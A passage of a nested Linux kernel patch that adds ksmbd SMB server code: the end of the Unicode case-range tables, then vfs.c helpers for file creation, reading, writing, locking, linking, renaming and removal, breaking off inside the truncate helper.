++	0, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80, 80,
++					 0, 80, 80,	/* 400-40f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++					 32, 32, 32,	/* 410-41f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++					 32, 32, 32,	/* 420-42f */
++};
++
++/* Lower case range - Extended cyrillic */
++static signed char UniCaseRangeL0490[60] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 490-49f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4a0-4af */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 4b0-4bf */
++	0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1,
++};
++
++/* Lower case range - Extended latin and greek */
++static signed char UniCaseRangeL1e00[504] = {
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e00-1e0f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e10-1e1f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e20-1e2f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e30-1e3f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e40-1e4f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e50-1e5f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e60-1e6f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e70-1e7f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1e80-1e8f */
++	1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0,	/* 1e90-1e9f */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ea0-1eaf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1eb0-1ebf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ec0-1ecf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ed0-1edf */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0,	/* 1ee0-1eef */
++	1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,	/* 1ef0-1eff */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f00-1f0f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f10-1f1f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f20-1f2f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f30-1f3f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, 0, 0,	/* 1f40-1f4f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, -8, 0, -8, 0, -8, 0, -8,	/* 1f50-1f5f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f60-1f6f */
++	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,	/* 1f70-1f7f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f80-1f8f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1f90-1f9f */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -8, -8, -8, -8, -8, -8,	/* 1fa0-1faf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -74, -74, -9, 0, 0, 0,	/* 1fb0-1fbf */
++	0, 0, 0, 0, 0, 0, 0, 0, -86, -86, -86, -86, -9, 0,
++							 0, 0,	/* 1fc0-1fcf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -100, -100, 0, 0, 0, 0,	/* 1fd0-1fdf */
++	0, 0, 0, 0, 0, 0, 0, 0, -8, -8, -112, -112, -7, 0,
++							 0, 0,	/* 1fe0-1fef */
++	0, 0, 0, 0, 0, 0, 0, 0,
++};
++
++/* Lower case range - Wide latin */
++static signed char UniCaseRangeLff20[27] = {
++	0, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++							 32,	/* ff20-ff2f */
++	32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
++};
++
++/*
++ * Lower Case Range
++ */
++const struct UniCaseRange CifsUniLowerRange[] = {
++	{0x0380, 0x03ab, UniCaseRangeL0380},
++	{0x0400, 0x042f, UniCaseRangeL0400},
++	{0x0490, 0x04cb, UniCaseRangeL0490},
++	{0x1e00, 0x1ff7, UniCaseRangeL1e00},
++	{0xff20, 0xff3a, UniCaseRangeLff20},
++	{0}
++};
++#endif
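++
++/*
++ * How a lookup works, by example: uc = 0x03B1 (alpha) is >=
++ * sizeof(SmbUniUpperTable) (512), so UniToupper() scans
++ * SmbUniUpperRange and finds {0x03a0, 0x03ce, UniCaseRangeU03a0};
++ * UniCaseRangeU03a0[0x03B1 - 0x03A0] is -32, so the result is
++ * 0x03B1 - 32 = 0x0391 (ALPHA).
++ */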
++
++#endif /* __KSMBD_UNIUPR_H */
+diff --git a/fs/smb/server/vfs.c b/fs/smb/server/vfs.c
+new file mode 100644
+index 0000000000000..36914db8b6616
+--- /dev/null
++++ b/fs/smb/server/vfs.c
+@@ -0,0 +1,1911 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/kernel.h>
++#include <linux/fs.h>
++#include <linux/uaccess.h>
++#include <linux/backing-dev.h>
++#include <linux/writeback.h>
++#include <linux/xattr.h>
++#include <linux/falloc.h>
++#include <linux/fsnotify.h>
++#include <linux/dcache.h>
++#include <linux/slab.h>
++#include <linux/vmalloc.h>
++#include <linux/sched/xacct.h>
++#include <linux/crc32c.h>
++
++#include "../../internal.h"	/* for vfs_path_lookup */
++
++#include "glob.h"
++#include "oplock.h"
++#include "connection.h"
++#include "vfs.h"
++#include "vfs_cache.h"
++#include "smbacl.h"
++#include "ndr.h"
++#include "auth.h"
++#include "misc.h"
++
++#include "smb_common.h"
++#include "mgmt/share_config.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/user_session.h"
++#include "mgmt/user_config.h"
++
++static char *extract_last_component(char *path)
++{
++	char *p = strrchr(path, '/');
++
++	if (p && p[1] != '\0') {
++		*p = '\0';
++		p++;
++	} else {
++		p = NULL;
++	}
++	return p;
++}
++
++static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
++				    struct inode *parent_inode,
++				    struct inode *inode)
++{
++	if (!test_share_config_flag(work->tcon->share_conf,
++				    KSMBD_SHARE_FLAG_INHERIT_OWNER))
++		return;
++
++	i_uid_write(inode, i_uid_read(parent_inode));
++}
++
++/**
++ * ksmbd_vfs_lock_parent() - lock parent dentry if it is stable
++ *
++ * The parent dentry obtained via dget_parent() (or passed in as @parent)
++ * could be unstable, so we lock the parent inode and look up the
++ * child dentry again to verify it is still the same.
++ *
++ * The reference count of @parent isn't incremented.
++ */
++int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
++			  struct dentry *child)
++{
++	struct dentry *dentry;
++	int ret = 0;
++
++	inode_lock_nested(d_inode(parent), I_MUTEX_PARENT);
++	dentry = lookup_one(user_ns, child->d_name.name, parent,
++			    child->d_name.len);
++	if (IS_ERR(dentry)) {
++		ret = PTR_ERR(dentry);
++		goto out_err;
++	}
++
++	if (dentry != child) {
++		ret = -ESTALE;
++		dput(dentry);
++		goto out_err;
++	}
++
++	dput(dentry);
++	return 0;
++out_err:
++	inode_unlock(d_inode(parent));
++	return ret;
++}
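++
++/*
++ * Note: on success the parent inode is left locked; the caller is
++ * responsible for inode_unlock(d_inode(parent)), as
++ * ksmbd_vfs_may_delete() below demonstrates.
++ */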
++
++int ksmbd_vfs_may_delete(struct user_namespace *user_ns,
++			 struct dentry *dentry)
++{
++	struct dentry *parent;
++	int ret;
++
++	parent = dget_parent(dentry);
++	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
++	if (ret) {
++		dput(parent);
++		return ret;
++	}
++
++	ret = inode_permission(user_ns, d_inode(parent),
++			       MAY_EXEC | MAY_WRITE);
++
++	inode_unlock(d_inode(parent));
++	dput(parent);
++	return ret;
++}
++
++int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++				   struct dentry *dentry, __le32 *daccess)
++{
++	struct dentry *parent;
++	int ret = 0;
++
++	*daccess = cpu_to_le32(FILE_READ_ATTRIBUTES | READ_CONTROL);
++
++	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_WRITE))
++		*daccess |= cpu_to_le32(WRITE_DAC | WRITE_OWNER | SYNCHRONIZE |
++				FILE_WRITE_DATA | FILE_APPEND_DATA |
++				FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES |
++				FILE_DELETE_CHILD);
++
++	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_READ))
++		*daccess |= FILE_READ_DATA_LE | FILE_READ_EA_LE;
++
++	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_EXEC))
++		*daccess |= FILE_EXECUTE_LE;
++
++	parent = dget_parent(dentry);
++	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
++	if (ret) {
++		dput(parent);
++		return ret;
++	}
++
++	if (!inode_permission(user_ns, d_inode(parent), MAY_EXEC | MAY_WRITE))
++		*daccess |= FILE_DELETE_LE;
++
++	inode_unlock(d_inode(parent));
++	dput(parent);
++	return ret;
++}
++
++/**
++ * ksmbd_vfs_create() - vfs helper for smb create file
++ * @work:	work
++ * @name:	file name that is relative to share
++ * @mode:	file create mode
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode)
++{
++	struct path path;
++	struct dentry *dentry;
++	int err;
++
++	dentry = ksmbd_vfs_kern_path_create(work, name,
++					    LOOKUP_NO_SYMLINKS, &path);
++	if (IS_ERR(dentry)) {
++		err = PTR_ERR(dentry);
++		if (err != -ENOENT)
++			pr_err("path create failed for %s, err %d\n",
++			       name, err);
++		return err;
++	}
++
++	mode |= S_IFREG;
++	err = vfs_create(mnt_user_ns(path.mnt), d_inode(path.dentry),
++			 dentry, mode, true);
++	if (!err) {
++		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry),
++					d_inode(dentry));
++	} else {
++		pr_err("File(%s): creation failed (err:%d)\n", name, err);
++	}
++	done_path_create(&path, dentry);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_mkdir() - vfs helper for smb create directory
++ * @work:	work
++ * @name:	directory name that is relative to share
++ * @mode:	directory create mode
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode)
++{
++	struct user_namespace *user_ns;
++	struct path path;
++	struct dentry *dentry;
++	int err;
++
++	dentry = ksmbd_vfs_kern_path_create(work, name,
++					    LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
++					    &path);
++	if (IS_ERR(dentry)) {
++		err = PTR_ERR(dentry);
++		if (err != -EEXIST)
++			ksmbd_debug(VFS, "path create failed for %s, err %d\n",
++				    name, err);
++		return err;
++	}
++
++	user_ns = mnt_user_ns(path.mnt);
++	mode |= S_IFDIR;
++	err = vfs_mkdir(user_ns, d_inode(path.dentry), dentry, mode);
++	if (err) {
++		goto out;
++	} else if (d_unhashed(dentry)) {
++		struct dentry *d;
++
++		d = lookup_one(user_ns, dentry->d_name.name, dentry->d_parent,
++			       dentry->d_name.len);
++		if (IS_ERR(d)) {
++			err = PTR_ERR(d);
++			goto out;
++		}
++		if (unlikely(d_is_negative(d))) {
++			dput(d);
++			err = -ENOENT;
++			goto out;
++		}
++
++		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry), d_inode(d));
++		dput(d);
++	}
++out:
++	done_path_create(&path, dentry);
++	if (err)
++		pr_err("mkdir(%s): creation failed (err:%d)\n", name, err);
++	return err;
++}
++
++static ssize_t ksmbd_vfs_getcasexattr(struct user_namespace *user_ns,
++				      struct dentry *dentry, char *attr_name,
++				      int attr_name_len, char **attr_value)
++{
++	char *name, *xattr_list = NULL;
++	ssize_t value_len = -ENOENT, xattr_list_len;
++
++	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	if (xattr_list_len <= 0)
++		goto out;
++
++	for (name = xattr_list; name - xattr_list < xattr_list_len;
++			name += strlen(name) + 1) {
++		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
++		if (strncasecmp(attr_name, name, attr_name_len))
++			continue;
++
++		value_len = ksmbd_vfs_getxattr(user_ns,
++					       dentry,
++					       name,
++					       attr_value);
++		if (value_len < 0)
++			pr_err("failed to get xattr in file\n");
++		break;
++	}
++
++out:
++	kvfree(xattr_list);
++	return value_len;
++}
++
++static int ksmbd_vfs_stream_read(struct ksmbd_file *fp, char *buf, loff_t *pos,
++				 size_t count)
++{
++	ssize_t v_len;
++	char *stream_buf = NULL;
++
++	ksmbd_debug(VFS, "read stream data pos : %llu, count : %zd\n",
++		    *pos, count);
++
++	v_len = ksmbd_vfs_getcasexattr(file_mnt_user_ns(fp->filp),
++				       fp->filp->f_path.dentry,
++				       fp->stream.name,
++				       fp->stream.size,
++				       &stream_buf);
++	if ((int)v_len <= 0)
++		return (int)v_len;
++
++	if (v_len <= *pos) {
++		count = -EINVAL;
++		goto free_buf;
++	}
++
++	if (v_len - *pos < count)
++		count = v_len - *pos;
++
++	memcpy(buf, &stream_buf[*pos], count);
++
++free_buf:
++	kvfree(stream_buf);
++	return count;
++}
++
++/**
++ * check_lock_range() - vfs helper for smb byte range file locking
++ * @filp:	the file to apply the lock to
++ * @start:	lock start byte offset
++ * @end:	lock end byte offset
++ * @type:	byte range type read/write
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int check_lock_range(struct file *filp, loff_t start, loff_t end,
++			    unsigned char type)
++{
++	struct file_lock *flock;
++	struct file_lock_context *ctx = file_inode(filp)->i_flctx;
++	int error = 0;
++
++	if (!ctx || list_empty_careful(&ctx->flc_posix))
++		return 0;
++
++	spin_lock(&ctx->flc_lock);
++	list_for_each_entry(flock, &ctx->flc_posix, fl_list) {
++		/* check conflict locks */
++		if (flock->fl_end >= start && end >= flock->fl_start) {
++			if (flock->fl_type == F_RDLCK) {
++				if (type == WRITE) {
++					pr_err("write not allowed due to shared lock\n");
++					error = 1;
++					goto out;
++				}
++			} else if (flock->fl_type == F_WRLCK) {
++				/* check owner in lock */
++				if (flock->fl_file != filp) {
++					error = 1;
++					pr_err("rw access not allowed due to exclusive lock held by another open\n");
++					goto out;
++				}
++			}
++		}
++	}
++out:
++	spin_unlock(&ctx->flc_lock);
++	return error;
++}
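++
++/*
++ * Overlap rule used above, illustrated: ranges [start, end] and
++ * [fl_start, fl_end] conflict exactly when fl_end >= start and
++ * end >= fl_start. For example, an existing F_RDLCK over bytes
++ * 0-99 conflicts with a WRITE check over 50-150, but not with a
++ * READ check, since shared locks only exclude writers.
++ */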
++
++/**
++ * ksmbd_vfs_read() - vfs helper for smb file read
++ * @work:	smb work
++ * @fp:	ksmbd file pointer of open file
++ * @count:	read byte count
++ * @pos:	file pos
++ *
++ * Return:	number of read bytes on success, otherwise error
++ */
++int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
++		   loff_t *pos)
++{
++	struct file *filp = fp->filp;
++	ssize_t nbytes = 0;
++	char *rbuf = work->aux_payload_buf;
++	struct inode *inode = file_inode(filp);
++
++	if (S_ISDIR(inode->i_mode))
++		return -EISDIR;
++
++	if (unlikely(count == 0))
++		return 0;
++
++	if (work->conn->connection_type) {
++		if (!(fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
++			pr_err("no right to read(%pD)\n", fp->filp);
++			return -EACCES;
++		}
++	}
++
++	if (ksmbd_stream_fd(fp))
++		return ksmbd_vfs_stream_read(fp, rbuf, pos, count);
++
++	if (!work->tcon->posix_extensions) {
++		int ret;
++
++		ret = check_lock_range(filp, *pos, *pos + count - 1, READ);
++		if (ret) {
++			pr_err("unable to read due to lock\n");
++			return -EAGAIN;
++		}
++	}
++
++	nbytes = kernel_read(filp, rbuf, count, pos);
++	if (nbytes < 0) {
++		pr_err("smb read failed, err = %zd\n", nbytes);
++		return nbytes;
++	}
++
++	filp->f_pos = *pos;
++	return nbytes;
++}
++
++static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
++				  size_t count)
++{
++	char *stream_buf = NULL, *wbuf;
++	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
++	size_t size, v_len;
++	int err = 0;
++
++	ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
++		    *pos, count);
++
++	size = *pos + count;
++	if (size > XATTR_SIZE_MAX) {
++		size = XATTR_SIZE_MAX;
++		count = XATTR_SIZE_MAX - *pos;
++	}
++
++	v_len = ksmbd_vfs_getcasexattr(user_ns,
++				       fp->filp->f_path.dentry,
++				       fp->stream.name,
++				       fp->stream.size,
++				       &stream_buf);
++	if ((int)v_len < 0) {
++		pr_err("stream not found in xattr : %zd\n", v_len);
++		err = (int)v_len;
++		goto out;
++	}
++
++	if (v_len < size) {
++		wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++		if (!wbuf) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		if (v_len > 0)
++			memcpy(wbuf, stream_buf, v_len);
++		kvfree(stream_buf);
++		stream_buf = wbuf;
++	}
++
++	memcpy(&stream_buf[*pos], buf, count);
++
++	err = ksmbd_vfs_setxattr(user_ns,
++				 fp->filp->f_path.dentry,
++				 fp->stream.name,
++				 (void *)stream_buf,
++				 size,
++				 0);
++	if (err < 0)
++		goto out;
++
++	fp->filp->f_pos = *pos;
++	err = 0;
++out:
++	kvfree(stream_buf);
++	return err;
++}
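++
++/*
++ * Layout sketch for the helper above: an alternate data stream such
++ * as "foo:bar" is backed by a single xattr on "foo" (named via
++ * ksmbd_vfs_xattr_stream_name()), so each stream write reads the
++ * current value, patches count bytes at *pos into an in-memory
++ * copy, and stores the whole value back; streams are therefore
++ * capped at XATTR_SIZE_MAX bytes.
++ */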
++
++/**
++ * ksmbd_vfs_write() - vfs helper for smb file write
++ * @work:	work
++ * @fp:	ksmbd file pointer of open file
++ * @buf:	buf containing data for writing
++ * @count:	number of bytes to write
++ * @pos:	file pos
++ * @sync:	fsync after write
++ * @written:	number of bytes written
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
++		    char *buf, size_t count, loff_t *pos, bool sync,
++		    ssize_t *written)
++{
++	struct file *filp;
++	loff_t	offset = *pos;
++	int err = 0;
++
++	if (work->conn->connection_type) {
++		if (!(fp->daccess & FILE_WRITE_DATA_LE)) {
++			pr_err("no right to write(%pD)\n", fp->filp);
++			err = -EACCES;
++			goto out;
++		}
++	}
++
++	filp = fp->filp;
++
++	if (ksmbd_stream_fd(fp)) {
++		err = ksmbd_vfs_stream_write(fp, buf, pos, count);
++		if (!err)
++			*written = count;
++		goto out;
++	}
++
++	if (!work->tcon->posix_extensions) {
++		err = check_lock_range(filp, *pos, *pos + count - 1, WRITE);
++		if (err) {
++			pr_err("unable to write due to lock\n");
++			err = -EAGAIN;
++			goto out;
++		}
++	}
++
++	/* Do we need to break any of a levelII oplock? */
++	smb_break_all_levII_oplock(work, fp, 1);
++
++	err = kernel_write(filp, buf, count, pos);
++	if (err < 0) {
++		ksmbd_debug(VFS, "smb write failed, err = %d\n", err);
++		goto out;
++	}
++
++	filp->f_pos = *pos;
++	*written = err;
++	err = 0;
++	if (sync) {
++		err = vfs_fsync_range(filp, offset, offset + *written, 0);
++		if (err < 0)
++			pr_err("fsync failed for filename = %pD, err = %d\n",
++			       fp->filp, err);
++	}
++
++out:
++	return err;
++}
++
++/**
++ * ksmbd_vfs_getattr() - vfs helper for smb getattr
++ * @path:	path of the file
++ * @stat:	kstat buffer that receives the attributes
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat)
++{
++	int err;
++
++	err = vfs_getattr(path, stat, STATX_BTIME, AT_STATX_SYNC_AS_STAT);
++	if (err)
++		pr_err("getattr failed, err %d\n", err);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_fsync() - vfs helper for smb fsync
++ * @work:	work
++ * @fid:	volatile file id of open file
++ * @p_id:	persistent file id of open file
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id)
++{
++	struct ksmbd_file *fp;
++	int err;
++
++	fp = ksmbd_lookup_fd_slow(work, fid, p_id);
++	if (!fp) {
++		pr_err("failed to get filp for fid %llu\n", fid);
++		return -ENOENT;
++	}
++	err = vfs_fsync(fp->filp, 0);
++	if (err < 0)
++		pr_err("smb fsync failed, err = %d\n", err);
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_remove_file() - vfs helper for smb rmdir or unlink
++ * @work:	smb work
++ * @name:	directory or file name that is relative to share
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name)
++{
++	struct user_namespace *user_ns;
++	struct path path;
++	struct dentry *parent;
++	int err;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
++
++	err = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, false);
++	if (err) {
++		ksmbd_debug(VFS, "can't get %s, err %d\n", name, err);
++		ksmbd_revert_fsids(work);
++		return err;
++	}
++
++	user_ns = mnt_user_ns(path.mnt);
++	parent = dget_parent(path.dentry);
++	err = ksmbd_vfs_lock_parent(user_ns, parent, path.dentry);
++	if (err) {
++		dput(parent);
++		path_put(&path);
++		ksmbd_revert_fsids(work);
++		return err;
++	}
++
++	if (!d_inode(path.dentry)->i_nlink) {
++		err = -ENOENT;
++		goto out_err;
++	}
++
++	if (S_ISDIR(d_inode(path.dentry)->i_mode)) {
++		err = vfs_rmdir(user_ns, d_inode(parent), path.dentry);
++		if (err && err != -ENOTEMPTY)
++			ksmbd_debug(VFS, "%s: rmdir failed, err %d\n", name,
++				    err);
++	} else {
++		err = vfs_unlink(user_ns, d_inode(parent), path.dentry, NULL);
++		if (err)
++			ksmbd_debug(VFS, "%s: unlink failed, err %d\n", name,
++				    err);
++	}
++
++out_err:
++	inode_unlock(d_inode(parent));
++	dput(parent);
++	path_put(&path);
++	ksmbd_revert_fsids(work);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_link() - vfs helper for creating smb hardlink
++ * @work:	smb work
++ * @oldname:	source file name
++ * @newname:	hardlink name that is relative to share
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_link(struct ksmbd_work *work, const char *oldname,
++		   const char *newname)
++{
++	struct path oldpath, newpath;
++	struct dentry *dentry;
++	int err;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
++
++	err = kern_path(oldname, LOOKUP_NO_SYMLINKS, &oldpath);
++	if (err) {
++		pr_err("cannot get linux path for %s, err = %d\n",
++		       oldname, err);
++		goto out1;
++	}
++
++	dentry = ksmbd_vfs_kern_path_create(work, newname,
++					    LOOKUP_NO_SYMLINKS | LOOKUP_REVAL,
++					    &newpath);
++	if (IS_ERR(dentry)) {
++		err = PTR_ERR(dentry);
++		pr_err("path create err for %s, err %d\n", newname, err);
++		goto out2;
++	}
++
++	err = -EXDEV;
++	if (oldpath.mnt != newpath.mnt) {
++		pr_err("vfs_link failed err %d\n", err);
++		goto out3;
++	}
++
++	err = vfs_link(oldpath.dentry, mnt_user_ns(newpath.mnt),
++		       d_inode(newpath.dentry),
++		       dentry, NULL);
++	if (err)
++		ksmbd_debug(VFS, "vfs_link failed err %d\n", err);
++
++out3:
++	done_path_create(&newpath, dentry);
++out2:
++	path_put(&oldpath);
++out1:
++	ksmbd_revert_fsids(work);
++	return err;
++}
++
++static int ksmbd_validate_entry_in_use(struct dentry *src_dent)
++{
++	struct dentry *dst_dent;
++
++	spin_lock(&src_dent->d_lock);
++	list_for_each_entry(dst_dent, &src_dent->d_subdirs, d_child) {
++		struct ksmbd_file *child_fp;
++
++		if (d_really_is_negative(dst_dent))
++			continue;
++
++		child_fp = ksmbd_lookup_fd_inode(d_inode(dst_dent));
++		if (child_fp) {
++			spin_unlock(&src_dent->d_lock);
++			ksmbd_debug(VFS, "Forbid rename, sub file/dir is in use\n");
++			return -EACCES;
++		}
++	}
++	spin_unlock(&src_dent->d_lock);
++
++	return 0;
++}
++
++static int __ksmbd_vfs_rename(struct ksmbd_work *work,
++			      struct user_namespace *src_user_ns,
++			      struct dentry *src_dent_parent,
++			      struct dentry *src_dent,
++			      struct user_namespace *dst_user_ns,
++			      struct dentry *dst_dent_parent,
++			      struct dentry *trap_dent,
++			      char *dst_name)
++{
++	struct dentry *dst_dent;
++	int err;
++
++	if (!work->tcon->posix_extensions) {
++		err = ksmbd_validate_entry_in_use(src_dent);
++		if (err)
++			return err;
++	}
++
++	if (d_really_is_negative(src_dent_parent))
++		return -ENOENT;
++	if (d_really_is_negative(dst_dent_parent))
++		return -ENOENT;
++	if (d_really_is_negative(src_dent))
++		return -ENOENT;
++	if (src_dent == trap_dent)
++		return -EINVAL;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
++
++	dst_dent = lookup_one(dst_user_ns, dst_name, dst_dent_parent,
++			      strlen(dst_name));
++	err = PTR_ERR(dst_dent);
++	if (IS_ERR(dst_dent)) {
++		pr_err("lookup failed %s [%d]\n", dst_name, err);
++		goto out;
++	}
++
++	err = -ENOTEMPTY;
++	if (dst_dent != trap_dent && !d_really_is_positive(dst_dent)) {
++		struct renamedata rd = {
++			.old_mnt_userns	= src_user_ns,
++			.old_dir	= d_inode(src_dent_parent),
++			.old_dentry	= src_dent,
++			.new_mnt_userns	= dst_user_ns,
++			.new_dir	= d_inode(dst_dent_parent),
++			.new_dentry	= dst_dent,
++		};
++		err = vfs_rename(&rd);
++	}
++	if (err)
++		pr_err("vfs_rename failed err %d\n", err);
++	if (dst_dent)
++		dput(dst_dent);
++out:
++	ksmbd_revert_fsids(work);
++	return err;
++}
++
++int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
++			char *newname)
++{
++	struct user_namespace *user_ns;
++	struct path dst_path;
++	struct dentry *src_dent_parent, *dst_dent_parent;
++	struct dentry *src_dent, *trap_dent, *src_child;
++	char *dst_name;
++	int err;
++
++	dst_name = extract_last_component(newname);
++	if (!dst_name) {
++		dst_name = newname;
++		newname = "";
++	}
++
++	src_dent_parent = dget_parent(fp->filp->f_path.dentry);
++	src_dent = fp->filp->f_path.dentry;
++
++	err = ksmbd_vfs_kern_path(work, newname,
++				  LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
++				  &dst_path, false);
++	if (err) {
++		ksmbd_debug(VFS, "Cannot get path for %s [%d]\n", newname, err);
++		goto out;
++	}
++	dst_dent_parent = dst_path.dentry;
++
++	trap_dent = lock_rename(src_dent_parent, dst_dent_parent);
++	dget(src_dent);
++	dget(dst_dent_parent);
++	user_ns = file_mnt_user_ns(fp->filp);
++	src_child = lookup_one(user_ns, src_dent->d_name.name, src_dent_parent,
++			       src_dent->d_name.len);
++	if (IS_ERR(src_child)) {
++		err = PTR_ERR(src_child);
++		goto out_lock;
++	}
++
++	if (src_child != src_dent) {
++		err = -ESTALE;
++		dput(src_child);
++		goto out_lock;
++	}
++	dput(src_child);
++
++	err = __ksmbd_vfs_rename(work,
++				 user_ns,
++				 src_dent_parent,
++				 src_dent,
++				 mnt_user_ns(dst_path.mnt),
++				 dst_dent_parent,
++				 trap_dent,
++				 dst_name);
++out_lock:
++	dput(src_dent);
++	dput(dst_dent_parent);
++	unlock_rename(src_dent_parent, dst_dent_parent);
++	path_put(&dst_path);
++out:
++	dput(src_dent_parent);
++	return err;
++}
++
++/**
++ * ksmbd_vfs_truncate() - vfs helper for smb file truncate
++ * @work:	work
++ * @fp:	ksmbd file pointer of the file to truncate
++ * @size:	truncate to given size
++ *
++ * Return:	0 on success, otherwise error
++ */
++int ksmbd_vfs_truncate(struct ksmbd_work *work,
++		       struct ksmbd_file *fp, loff_t size)
++{
++	int err = 0;
++	struct file *filp;
++
++	filp = fp->filp;
++
++	/* Do we need to break any of a levelII oplock? */
++	smb_break_all_levII_oplock(work, fp, 1);
++
++	if (!work->tcon->posix_extensions) {
++		struct inode *inode = file_inode(filp);
++
++		if (size < inode->i_size) {
